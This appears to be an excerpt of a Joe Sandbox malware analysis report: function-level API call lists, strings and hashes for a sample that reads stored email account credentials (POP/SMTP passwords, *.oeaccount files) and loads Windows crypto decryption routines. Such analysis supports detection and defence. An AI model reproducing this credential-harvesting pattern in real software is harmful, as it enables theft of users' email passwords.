                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                            • memset.MSVCRT ref: 00410E10
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                            • API String ID: 889583718-2036018995
                                                            • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                            • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                            APIs
                                                            • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                            • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                            • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                            • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                            • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                            • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                            APIs
                                                            • memset.MSVCRT ref: 004109F7
                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                            • memset.MSVCRT ref: 00410A32
                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                            • String ID:
                                                            • API String ID: 3143880245-0
                                                            • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                            • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D5C
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D7A
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D98
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408DA8
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            • API String ID: 1033339047-0
                                                            • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                            • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                            • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                            • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                            APIs
                                                            • malloc.MSVCRT ref: 00406F4C
                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,75D50A60,00407A43,00000001,?,00000000,75D50A60,00407DBD,00000000,?,?), ref: 00406F64
                                                            • free.MSVCRT ref: 00406F6D
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: freemallocmemcpy
                                                            • String ID:
                                                            • API String ID: 3056473165-0
                                                            • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                            • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                            • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                            • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                            APIs
                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                            • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFontIndirect_mbscpymemset
                                                            • String ID: Arial
                                                            • API String ID: 3853255127-493054409
                                                            • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                            • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                            • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                            • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                            APIs
                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$_strcmpimemset
                                                            • String ID: /stext
                                                            • API String ID: 520177685-3817206916
                                                            • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                            • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                            APIs
                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID:
                                                            • API String ID: 145871493-0
                                                            • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                            • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                            APIs
                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                            • String ID:
                                                            • API String ID: 4165544737-0
                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                            APIs
                                                            • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                            APIs
                                                            • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: EnumNamesResource
                                                            • String ID:
                                                            • API String ID: 3334572018-0
                                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                            APIs
                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                            • API String ID: 2238633743-192783356
                                                            • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                            • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                            • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                            • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                              • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                            • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                            • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$QueryValue$CloseOpen
                                                            • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                            • API String ID: 52435246-1534328989
                                                            • Opcode ID: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                            • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                            • Opcode Fuzzy Hash: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                            • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 00406E06
                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                            • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                            • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                            • GetLastError.KERNEL32 ref: 00406E74
                                                            • CloseHandle.KERNEL32(?), ref: 00406E80
                                                            • GetLastError.KERNEL32 ref: 00406E8B
                                                            • CloseClipboard.USER32 ref: 00406E94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                            • String ID:
                                                            • API String ID: 3604893535-0
